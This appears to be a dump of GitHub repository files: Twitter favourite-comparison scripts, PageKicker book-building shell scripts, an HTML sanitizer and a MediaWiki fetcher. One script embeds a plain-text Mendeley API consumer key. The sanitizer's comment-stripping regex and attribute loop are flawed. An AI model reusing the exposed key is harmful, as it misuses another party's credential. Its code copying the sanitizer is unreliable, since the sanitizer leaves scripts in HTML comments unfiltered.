differentiated expressions in a string\n\t\tanswer = ''\n\t\tfor exp in expressions:\n\t\t\tanswer += differentiate(exp,respect_to)+'='\n\t\tanswer = answer[:len(answer)-1]\n\t\treturn negative2tilde(answer,'r')\n\t\t\t\n\tif '+' in expression or '-' in expression:\n\t\t#Change negative signs to ~ for simplicity\n\t\texpression = negative2tilde(expression,'f')\n\t\t#Create a list of indicies where the operations are (+ or -)\n\t\toperation_positions = [0]\n\t\t#Create a list of terms before the plus or minus\n\t\tplus_positions = [0]\n\t\tminus_positions = [0]\n\t\toperation_count = 0\n\t\tfor ind,char in enumerate(expression):\n\t\t\tif char == '+':\n\t\t\t\toperation_positions += [ind,ind+1]\n\t\t\t\toperation_count += 1\n\t\t\t\tplus_positions += [operation_count]\n\t\t\telif char == '-':\n\t\t\t\toperation_positions += [ind,ind+1]\n\t\t\t\toperation_count += 1\n\t\t\t\tminus_positions += [operation_count]\n\t\toperation_positions += [len(expression)]\n\t \n\t\t#Create a list of expressions between the operations\n\t\texpressions = []\n\t\tfor i in range(0,len(operation_positions),2):\n\t\t\texpressions += [expression[operation_positions[i]:operation_positions[i+1]]]\n\t \n\t\t#Attach differentiated expressions in a string\n\t\tanswer = ''\n\t\tfor ind, exp in enumerate(expressions):\n\t\t\tanswer += differentiate(exp,respect_to)\n\t\t\tif ind+1 in plus_positions:\n\t\t\t\tanswer += '+'\n\t\t\telif ind+1 in minus_positions:\n\t\t\t\tanswer += '-'\n\t\t#Change ~ back to -\n\t\treturn negative2tilde(answer,'r')\n\t\t\t\n\t\t\t\n\t#Differentiating a expression with respect to itself gives you 1\n\t#Differentiating a constant gives you 0\n\t#Differentiating a expression with respect anything else gives you d(expression)/d(respect_to)\n\tif expression == respect_to:\n\t\treturn '1'\n\telif set(expression) <= set('1234567890.'):\n\t\treturn '0'\n\telse:\n\t\treturn 'd(%s)/d(%s)' % (expression,respect_to)" } ]
1
BasmatiBlanco/TwitterCompare
https://github.com/BasmatiBlanco/TwitterCompare
5857ce76f0f71ebd3cdb2b85c63d0cfb31c4fe55
a515614cdb03d42143513d39994ddc631af6924a
729959d96eae79f4d8d42d96160e6f6a4a732b37
refs/heads/master
2022-12-17T10:03:12.897793
2020-09-08T19:28:56
2020-09-08T19:28:56
292,330,453
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5577078461647034, "alphanum_fraction": 0.5738498568534851, "avg_line_length": 26.18181800842285, "blob_id": "bc77c979f7643cd75b2c0c3d6900981e5154ab38", "content_id": "d6dc2801cda8163ccbcd5243cbbc500226fda35b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2478, "license_type": "no_license", "max_line_length": 94, "num_lines": 88, "path": "/Twitter-Comp-GUI.py", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "import tkinter as tk\r\nimport matplotlib.pyplot as plt\r\nimport tweepy\r\nfrom tweepy import OAuthHandler\r\nfrom credentials import *\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\nx = []\r\ny = []\r\nx2 = []\r\ny2 = []\r\ntweet_fav1 = 0\r\ntweet_fav2 = 0\r\ndef compare_tweets_graph(screen_name, graph_order):\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n tweet_list = []\r\n tweet_list.extend(recent_tweets)\r\n\r\n marker = tweet_list[-1].id-1\r\n while len(recent_tweets) > 0:\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1 \r\n if graph_order == 1: \r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n y.append(tweet.favorite_count)\r\n x.append(tweet.created_at)\r\n elif graph_order == 2:\r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n y2.append(tweet.favorite_count)\r\n x2.append(tweet.created_at)\r\ndef graph_tweets(user1, user2):\r\n compare_tweets_graph(user1, 1)\r\n compare_tweets_graph(user2, 2)\r\n plt.plot(x, y, label = user1)\r\n plt.plot(x2, y2, label = user2) \r\n plt.xlabel(\"Time\") \r\n plt.ylabel('Faves') \r\n plt.title(\"Faves over Time \") \r\n plt.legend()\r\n plt.show()\r\n\r\nroot = tk.Tk()\r\n\r\ngreeting = tk.Label (\r\n text = \"Compare Users\", \r\n foreground = \"black\",\r\n )\r\nfirst_user = tk.Label (\r\n text = \"First\", \r\n foreground = \"black\",\r\n )\r\nsecond_user = tk.Label (\r\n text = \"Second\", \r\n foreground = \"black\",\r\n )\r\nentry_first = tk.Entry(fg = \"black\", bg = \"AntiqueWhite1\", width = 50)\r\nentry_second = tk.Entry(fg = \"black\", bg = \"AntiqueWhite1\", width = 50)\r\n\r\nbutton = tk.Button(\r\n text=\"Submit\",\r\n width=25,\r\n height=1,\r\n bg=\"black\",\r\n fg=\"white\",\r\n command = lambda: get_in_graph()\r\n )\r\n\r\ndef get_in_graph():\r\n first_in = entry_first.get()\r\n second_in = entry_second.get()\r\n graph_tweets(first_in, second_in)\r\n\r\ngreeting.pack()\r\nfirst_user.pack()\r\nentry_first.pack()\r\nsecond_user.pack()\r\nentry_second.pack()\r\nbutton.pack()\r\nroot.mainloop()" }, { "alpha_fraction": 0.5764367580413818, "alphanum_fraction": 0.5956896543502808, "avg_line_length": 35.84782791137695, "blob_id": "bdeefa096ff1b86c94f2eafb3f9bb38a5952dc69", "content_id": "b6dbbcbb09002f68e6e8db1c53d9efcc6bbc871a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3480, "license_type": "no_license", "max_line_length": 153, "num_lines": 92, "path": "/graph.py", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\r\nimport tweepy\r\nfrom tweepy import OAuthHandler\r\nfrom credentials import *\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\nx = []\r\ny = []\r\nx2 = []\r\ny2 = []\r\ntweet_fav1 = 0\r\ntweet_fav2 = 0\r\n\r\nprint (\"Choose your first user to compare\")\r\nfirst = input()\r\nprint (\"Choose your second under to compare\")\r\nsecond = input()\r\nprint(\"Do you want to see a graph(Y/N)\")\r\ngraph_choice = input()\r\nif graph_choice != 'Y' and graph_choice != 'y' and graph_choice != 'N'and graph_choice != 'n':\r\n graph_choice = input(\"Please enter Y or N\")\r\n\r\n\r\ndef compare_tweets_graph(screen_name, graph_order):\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n tweet_list = []\r\n tweet_list.extend(recent_tweets)\r\n\r\n marker = tweet_list[-1].id-1\r\n while len(recent_tweets) > 0:\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1 \r\n if graph_order == 1: \r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n y.append(tweet.favorite_count)\r\n x.append(tweet.created_at)\r\n elif graph_order == 2:\r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n y2.append(tweet.favorite_count)\r\n x2.append(tweet.created_at)\r\n \r\ndef graph_tweets(user1, user2):\r\n compare_tweets_graph(user1, 1)\r\n compare_tweets_graph(user2, 2)\r\n plt.plot(x, y, label = user1 + str(tweet_fav1))\r\n plt.plot(x2, y2, label = user2 + str(tweet_fav2)) \r\n plt.xlabel(\"Time\") \r\n plt.ylabel('Faves') \r\n plt.title(\"Faves over Time \") \r\n plt.legend()\r\n plt.show()\r\n\r\ndef recent_tweet_list(screen_name):\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n tweet_list = []\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1\r\n while len(recent_tweets) > 0:\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1 \r\n tweet_fav = 0\r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n tweet_fav += tweet.favorite_count\r\n return tweet_fav\r\n\r\ndef compare_tweet_favs(user1, user2):\r\n total_user1= recent_tweet_list(user1)\r\n total_user2= recent_tweet_list(user2)\r\n if total_user1 > total_user2:\r\n print( str(user1) + \" is the winner with \" + str(total_user1) + \" favorites compared to \" + str(user2) + \"'s \" + str(total_user2) + \" favorites\")\r\n elif total_user1 < total_user2:\r\n print( str(user2) + \" is the winner with \" + str(total_user2) + \" favorites compared to \" + str(user1) + \"'s \" + str(total_user1) + \" favorites\")\r\n elif total_user1 == total_user2:\r\n print(\"It's a tie! both \" + str(user1) + \" and \" + str(user2) + \" have the same amount of favorites\")\r\n\r\nif graph_choice == 'y' or graph_choice == 'Y':\r\n graph_tweets(first, second)\r\nelif graph_choice == 'n' or graph_choice == 'N': \r\n compare_tweet_favs(first, second)" }, { "alpha_fraction": 0.6160714030265808, "alphanum_fraction": 0.6363095045089722, "avg_line_length": 36.181819915771484, "blob_id": "b95308066cdef06c9ff87f31dd29cf820364b0be", "content_id": "a78c6eace27663c5722e3445e545086b0868ddcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1680, "license_type": "no_license", "max_line_length": 153, "num_lines": 44, "path": "/twittercomparison.py", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "import tweepy\r\nfrom tweepy import OAuthHandler\r\nfrom credentials import *\r\n \r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\n\r\ndef recent_tweet_list(screen_name):\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200)\r\n tweet_list = []\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1\r\n while len(recent_tweets) > 0:\r\n recent_tweets = api.user_timeline (screen_name = screen_name,count=200, max_id=marker)\r\n tweet_list.extend(recent_tweets)\r\n marker = tweet_list[-1].id-1 \r\n tweet_fav = 0\r\n for tweet in tweet_list:\r\n if tweet.text.startswith(\"RT\"):\r\n tweet_list.remove(tweet)\r\n else:\r\n tweet_fav += tweet.favorite_count\r\n return tweet_fav\r\n\r\n\r\ndef compare_tweet_favs(user1, user2):\r\n total_user1= recent_tweet_list(user1)\r\n total_user2= recent_tweet_list(user2)\r\n if total_user1 > total_user2:\r\n print( str(user1) + \" is the winner with \" + str(total_user1) + \" favorites compared to \" + str(user2) + \"'s \" + str(total_user2) + \" favorites\")\r\n elif total_user1 < total_user2:\r\n print( str(user2) + \" is the winner with \" + str(total_user2) + \" favorites compared to \" + str(user1) + \"'s \" + str(total_user1) + \" favorites\")\r\n elif total_user1 == total_user2:\r\n print(\"It's a tie! both \" + str(user1) + \" and \" + str(user2) + \" have the same amount of favorites\")\r\n\r\n\r\nprint (\"Choose your first user to compare\")\r\nfirst = input()\r\nprint (\"Choose your second under to compare\")\r\nsecond = input()\r\n\r\ncompare_tweet_favs(first, second)\r\n" }, { "alpha_fraction": 0.761904776096344, "alphanum_fraction": 0.761904776096344, "avg_line_length": 57.85714340209961, "blob_id": "a5c46831dec7a00d81756bd8e5ef947abd1750b3", "content_id": "9260593b0ba2827c49f197f923a07ed9689a6c55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 420, "license_type": "no_license", "max_line_length": 119, "num_lines": 7, "path": "/readme.txt", "repo_name": "BasmatiBlanco/TwitterCompare", "src_encoding": "UTF-8", "text": "There are two versions of this project. \r\n\r\ngraph.py will give you the option to compare the tweets as either an aggregate of likes or as a graph.\r\ntwittercomparison.py will just compare two peoples tweets as aggregate. They are separate because graph.py is a mess. \r\nTwitter-Comp-GUI will use a GUI to make a simple graph, no option for it to just be text on command line. \r\n\r\nNext up, trying to make it run faster. \r\n" } ]
4
fredzannarbor/pagekicker-community
https://github.com/fredzannarbor/pagekicker-community
8f582b3a43f650294563a44d53037211727b901c
02c3d39556dd37836a5933188a7b2798d3eada36
1623e8fa7c525d5a3eb924a71824f22acf0235cc
refs/heads/master
2021-07-10T07:53:43.815864
2021-04-22T07:10:40
2021-04-22T07:10:40
55,376,461
21
8
null
2016-04-04T00:38:12
2017-02-12T05:57:39
2017-02-15T02:23:34
HTML
[ { "alpha_fraction": 0.6969883441925049, "alphanum_fraction": 0.7000614404678345, "avg_line_length": 48.24242401123047, "blob_id": "fa3e05892a55342751f31782424e8b0f20c679d0", "content_id": "10f05ea6183bf6bd03feaa987c5ac7ff16bcc706", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1627, "license_type": "permissive", "max_line_length": 310, "num_lines": 33, "path": "/scripts/includes/front_matter.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " # build title page\n\n\techo \"# \"$customtitle > tmp/$uuid/titlepage.md\n\techo \"# \"$byline >> tmp/$uuid/titlepage.md\n echo \"# Enhanced with Text Analytics by PageKicker Robot\" $jobprofilename >> tmp/$uuid/titlepage.md\n\techo '![pk logo](assets/PageKicker_cmyk300dpi.png)\\' >> tmp/$uuid/titlepage.md\n\techo '\\pagenumbering{roman}' >> tmp/$uuid/titlepage.md\n\n pandoc tmp/$uuid/titlepage.md -o tmp/$uuid/titlepage.pdf --variable fontsize=12pt --latex-engine=xelatex\n\n # build \"About the Robot Author\"\n\n echo \"# About the Robot Author\" > tmp/$uuid/robot_author.md\n echo \"# $lastname\" >> tmp/$uuid/robot_author.md\n cat \"$authorbio\" >> tmp/$uuid/robot_author.md\n\n # build \"also by this Robot Author\"\n \n # build \"Acknowledgements\"\n\n cp assets/acknowledgements.md tmp/$uuid/acknowledgements.md\n\techo \" \" >> tmp/$uuid/acknowledgements.md\n\techo \" \" >> tmp/$uuid/acknowledgements.md\n\techo '![author-sig](../conf/jobprofiles/signatures/'\"$sigfile\"')' >> tmp/$uuid/acknowledgements.md\n\n # assemble front matter\n\n\tcat tmp/$uuid/titlepage.md assets/newpage.md assets/copyright_page.md assets/newpage.md tmp/$uuid/robot_author.md assets/newpage.md tmp/$uuid/acknowledgements.md assets/newpage.md tmp/$uuid/summary.md assets/newpage.md tmp/$uuid/rr.md assets/newpage.md tmp/$uuid/sorted_uniqs.md > tmp/$uuid/textfrontmatter.md\n\tpandoc tmp/$uuid/textfrontmatter.md --latex-engine=xelatex -o tmp/$uuid/textfrontmatter.pdf\n\n # add wordcloud page to front matter\n\n\tpdftk tmp/$uuid/textfrontmatter.pdf tmp/$uuid/wordcloud.pdf output tmp/$uuid/$uuid\"_frontmatter.pdf\"\n" }, { "alpha_fraction": 0.6701570749282837, "alphanum_fraction": 0.6701570749282837, "avg_line_length": 53.57143020629883, "blob_id": "834564c1c6113f62d3b86de9249d2f2e793864ba", "content_id": "2647406e2fef168805841759951f61df2da0de09", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 382, "license_type": "permissive", "max_line_length": 83, "num_lines": 7, "path": "/scripts/includes/listofpages.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo '\\pagenumbering{gobble}' > \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\necho \"# List of Chapters\" >> \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\ncat \"$TMPDIR$uuid/seeds/filtered.pagehits\" | sed G >> \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\necho \" \" >> \"$TMPDIR$uuid/listofpages.md\"\n" }, { "alpha_fraction": 0.5873016119003296, "alphanum_fraction": 0.682539701461792, "avg_line_length": 30.5, "blob_id": "2acbff2450b78cc5f2be5568589c77f71390178d", "content_id": "e8971c5944bdafb176bff4740494ca08325c94cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 63, "license_type": "permissive", "max_line_length": 50, "num_lines": 2, "path": "/test/1001_7.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh ../test/1001_7.csv 7\n" }, { "alpha_fraction": 0.563697874546051, "alphanum_fraction": 0.5678316354751587, "avg_line_length": 39.318180084228516, "blob_id": "fb62ac1915c3f38fc75c34539e80516cb853e67f", "content_id": "c7a816b3bd62ed625f15087bcf46411e9f0af31b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2661, "license_type": "permissive", "max_line_length": 100, "num_lines": 66, "path": "/scripts/bin/sanitize.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "from beautifulsoup4 import beautifulsoup4\nimport re\n\ndef sanitize(html):\n # allow these tags. Other tags are removed, but their child elements remain\n whitelist = ['em', 'i', 'strong', 'u', 'a', 'b', 'p', 'br', 'code', 'pre', 'table', 'tr', 'td' ]\n\n # allow only these attributes on these tags. No other tags are allowed any\n # attributes.\n attr_whitelist = { 'a':['href','title','hreflang']}\n\n # remove these tags, complete with contents.\n blacklist = [ 'script', 'style' ]\n\n attributes_with_urls = [ 'href', 'src' ]\n\n # BeautifulSoup is catching out-of-order and unclosed tags, so markup\n # can't leak out of comments and break the rest of the page.\n soup = BeautifulSoup(html)\n\n # now strip HTML we don't like.\n for tag in soup.findAll():\n if tag.name.lower() in blacklist:\n # blacklisted tags are removed in their entirety\n tag.extract()\n elif tag.name.lower() in whitelist:\n # tag is allowed. Make sure all the attributes are allowed.\n for attr in tag.attrs:\n # allowed attributes are whitelisted per-tag\n if tag.name.lower() in attr_whitelist and \\\n attr[0].lower() in attr_whitelist[ tag.name.lower() ]:\n # some attributes contain urls..\n if attr[0].lower() in attributes_with_urls:\n # ..make sure they're nice urls\n if not re.match(r'(https?|ftp)://', attr[1].lower()):\n tag.attrs.remove( attr )\n # ok, then\n pass\n else:\n # not a whitelisted attribute. Remove it.\n del tag[attr]\n else:\n # not a whitelisted tag. I'd like to remove it from the tree\n # and replace it with its children. But that's hard. It's much\n # easier to just replace it with an empty span tag.\n tag.name = \"span\"\n tag.attrs = []\n\n # stringify back again\n safe_html = str(soup)\n\n # HTML comments can contain executable scripts, depending on the browser,\n # so we'll\n # be paranoid and just get rid of all of them\n # e.g. <!--[if lt IE 7]><script type=\"text/javascript\">h4x0r();</script><!\n # [endif]-->\n # TODO - I rather suspect that this is the weakest part of the operation..\n safe_html = re.sub(r'<!--[.\\n]*?-->','',safe_html)\n return safe_html\n\nif __name__ == \"__main__\":\n\timport sys\n\tinput_file = open(sys.argv[1])\n\toutput_file = open(sys.argv[2], \"w\")\n\toutput_file.write(sanitize(input_file.read()).encode(\"utf8\"))\t\n\toutput_file.close()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6754385828971863, "avg_line_length": 21.700000762939453, "blob_id": "c89a2b9381e7e0d448314d6cda7cb7a31cabed13", "content_id": "fc7b6a4cae902a90090949752db73638313f49cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 228, "license_type": "permissive", "max_line_length": 142, "num_lines": 10, "path": "/scripts/rr_loop.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nrm out.txt\nfor file in *\ndo\n/opt/bitnami/java/bin/java -jar /opt/bitnami/apache2/htdocs/pk-new/development/scripts/lib/CmdFlesh.jar $file | sed -n '/Flesh-/p' >> out.txt\necho -n $file \",\" >> out.txt\ndone\n\nexit 0\n\n" }, { "alpha_fraction": 0.6912644505500793, "alphanum_fraction": 0.6972476840019226, "avg_line_length": 34.81428527832031, "blob_id": "7c3e484bbb35070d297e69ed3ee031a65489ca44", "content_id": "267ad420124d43bc5e9efb7fb48212e6e5323e33", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2507, "license_type": "permissive", "max_line_length": 246, "num_lines": 70, "path": "/scripts/daily-wp-post.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. \"$HOME\"/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\n\nmy_twitter_handle=\"fredzannarbor\"\nname=\"Samuel Johnson\"\npostauthorid=\"2\"\nuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\necho \"creating daily wordpress post\"\necho \"$TMPDIR$uuid\"\n\nmkdir -m 775 -p \"$TMPDIR$uuid/wordpress\"\n\n\n$FORTUNE_BIN johnson >> \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\"\ncat \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\"\nwotd_name=$(cat \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\" | head -n 1 | cut -d\" \" -f1)\nif [ \"$wotd_name\" = \"To\" ] ;\n then\n\t\twotd_name=$(cat \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\" | head -n 1 | cut -d\" \" -f2)\n\telse\n\t\ttrue\nfi\n# echo \"$wotd_name\"\n# echo \"$wotd_name\" > \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\necho \"## My Word of the Day\" >> \"$TMPDIR$uuid/wordpress/wotd_h2.txt\"\n\ncat \"$TMPDIR$uuid/wordpress/wotd_h2.txt\" \"$TMPDIR$uuid/wordpress/johnson_wotd.txt\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\n\necho -e \"\\n\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\n\necho \"## Recent references to $wotd_name on Twitter\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\nt search all \"$wotd_name lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n#t search all \"$wotd_name lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/twitter_wotd.txt\"\n\necho -e \"\\n\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\n\necho \"## Recent references to $name on Twitter\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\nt search all \"Samuel Johnson lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n#t search all \"Samuel Johnson lang:en -RT -$my_twitter_handle\" >> \"$TMPDIR$uuid/wordpress/twsjtest.md\"\n\npandoc -f markdown -t html -o \"$TMPDIR$uuid/wordpress/johnson_wotd.html\" \"$TMPDIR$uuid/wordpress/johnson_wotd.md\"\n\n\"$WP_BIN\" post create \"$TMPDIR$uuid/wordpress/johnson_wotd.html\" --post_type=post --post_status=\"publish\" --post_title=\"Daily Dose of Samuel Johnson: $wotd_name & more\" --post_mime_type=html --post_category=\"words-language\" --post_author=\"$postauthorid\"\n" }, { "alpha_fraction": 0.7049180269241333, "alphanum_fraction": 0.727556586265564, "avg_line_length": 60, "blob_id": "e64889e65dd8babc3ccfb786350496161e75d6de", "content_id": "4becc163a188f5853260d3b5e65b772d8eae90fd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1281, "license_type": "permissive", "max_line_length": 262, "num_lines": 21, "path": "/scripts/includes/Tiphys-keyword-search.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"singleseed is\" ${FLAGS_singleseed}\n\nsearchterm=${FLAGS_singleseed}\n\n# echo http://api.mendeley.com/oapi/documents/search/\"$searchterm\"?consumer_key=13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\n\ncurl --compressed --retry 2 --retry-delay 5 --retry-max 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/mendeley/$searchterm.json http://api.mendeley.com/oapi/documents/search/\"$searchterm\"?consumer_key=13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\n\necho \"ran Mendeley search\" | tee --append $tiphys_log\n\n# echo \"arxiv search is\" http://export.arxiv.org/api/query?search_query=all:\"$searchterm\"&start=0&max_results=${FLAGS_rows}\n\ncurl --compressed --retry 2 --retry-delay 5 --retry-max 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/arxiv/$searchterm http://export.arxiv.org/api/query?search_query=all:\"$searchterm\"&start=0&max_results=${FLAGS_rows}\n\necho \"ran arxiv search\" | tee --append $tiphys_log\n\n# echo \"plos search is \" http://api.plos.org/search?q=\"$searchterm\"&api_key=$plos_API_key\n\ncurl --compressed --retry 2 --retry-delay 5 --retry-max 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/plos/$searchterm http://api.plos.org/search?q=\"$searchterm\"&api_key={plos_API_key}\n\necho \"ran PLOS search\" | tee --append $tiphys_log\n" }, { "alpha_fraction": 0.6471428275108337, "alphanum_fraction": 0.6657142639160156, "avg_line_length": 20.212121963500977, "blob_id": "86d750845fc6b5377afeaed2dd921b3f3fc2e3ab", "content_id": "13a235aa8ec87b328ddff208dc202be2e2ce7a6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 700, "license_type": "permissive", "max_line_length": 65, "num_lines": 33, "path": "/scripts_python_3/bitcoin/fortune/pk21server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport subprocess\n\nfrom flask import Flask\n\n\nfrom two1.wallet import Wallet\nfrom two1.bitserv.flask import Payment\n\napp = Flask(__name__)\nwallet = Wallet()\npayment = Payment(app, wallet)\n\n# machine-payable endpoint that returns fortune if payment made\[email protected]('/buy')\[email protected](1000)\ndef buy_fortune():\n\n fortune = subprocess.check_output(['fortune', 'potterfacts'])\n return fortune\n \[email protected]('/manifest')\ndef docs():\n '''\n Serves the app manifest to the 21 crawler.\n '''\n with open('manifest.yaml', 'r') as f:\n manifest_yaml = yaml.load(f)\n return json.dumps(manifest_yaml)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.6613651514053345, "alphanum_fraction": 0.6673293709754944, "avg_line_length": 33.68965530395508, "blob_id": "c64bf3a038621c62c6e209dee8099805f782baa6", "content_id": "b34f158225bbaf29d69478411712e12d83738804", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3018, "license_type": "permissive", "max_line_length": 223, "num_lines": 87, "path": "/scripts/bin/mwclient_seeds_to_pages.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwikipedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nconverted to use mwclient libtary\nenhanced to allow pointing at any MediaWiki endpoint URL\n\nfetches MW pages specified in --infile\nmwclient_seeds_to_pages.py is responsible for providing exact page names to infile\npage names must be exact, i.e. are case and punctuation sensitive\n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\nfrom mwclient.errors import APIError, InvalidPageTitle\nimport time\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\n#parser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'http://en.wikipedia.org/w/api.php')\n#arser.add_argument(\"--endpoint_path\", help = \"mediawiki default is /w/api.php\", default = '/w/')\n#parser.add_argument(\"--client_certificate\", help = \"path to SSL certificate\", default = None)\n#parser.add_argument(\"--tuple\", help = \"tuple with http & path\", default = 'en.wikipedia.org, )) )s, endpoint, and path\", default = ('\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\n#mediawiki_api_url = args.mediawiki_api_url\n#endpoint_path = args.endpoint_path\nfull_tuple = \"('https', 'en.wikipedia.org')\"\n#full_tuple = \"'http', {}, 'path='{}\".format(mediawiki_api_url,endpoint_path)\n#print(full_tuple)\nsite = mwclient.Site('http://', 'en.wikipedia.org')\nprint(site)\n#client_certificate = args.client_certificate\n\n\"\"\"\nproviding client certificate option\nneeds testing on ssl + 